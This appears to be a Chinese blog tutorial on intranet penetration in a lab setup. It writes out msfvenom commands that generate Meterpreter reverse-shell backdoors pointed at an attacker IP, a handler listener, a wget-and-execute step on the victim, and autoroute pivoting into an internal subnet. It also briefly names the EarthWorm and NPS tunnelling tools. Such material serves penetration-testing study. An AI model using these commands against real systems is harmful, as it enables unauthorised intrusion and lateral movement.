内网穿透的几个常规方案
内网穿透
内网穿透,也即 NAT 穿透,利用各种隧道技术,以网络防火墙允许的协议,绕过网络防火墙的封锁,实现访问被封锁的目标网络。
Meterpreter
Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。
演示环境
- kali
攻击者服务器
外网IP:192.168.3.147 - Centos
受害者服务器
外网IP:192.168.3.151
内网IP:192.168.126.11
生成后门
利用msfvenom生成可执行后门,其中lhost为Kali的IP地址。
#Linux靶机
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.3.147 lport=4444 -f elf -o shell
#Windows靶机
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.147 lport=4444 -f exe -o shell.exe
监听端口
利用msf的handler模块进行监听。
msfconsole
use exploit/multi/handler
#set payload与生成后门模块需相同
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.3.147
set LPORT 4444
run
后门上传靶机并执行
kali开启Http服务
python -m SimpleHTTPServer 0.0.0.0:8000
Centos下载后门并执行
wget http://192.168.3.147:8000/shell
chmod +x shell
./shell
切换回Kali,可以看到已经接收到Shell并可以执行命令。
设置代理添加路由
查看内网主机网卡,其中192.168.3.0/24可访问,192.168.126.0/24不可访问
run get_local_subnets
在meterpreter添加路由表
run autoroute -s 192.168.126.0/24
扫描192.168.126.0/24主机端口(选用):
EarthWorm
EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。
下载地址:
https://github.com/rootkiter/EarthWorm/blob/master/server/download/ew.zip
NPS
nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。
本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!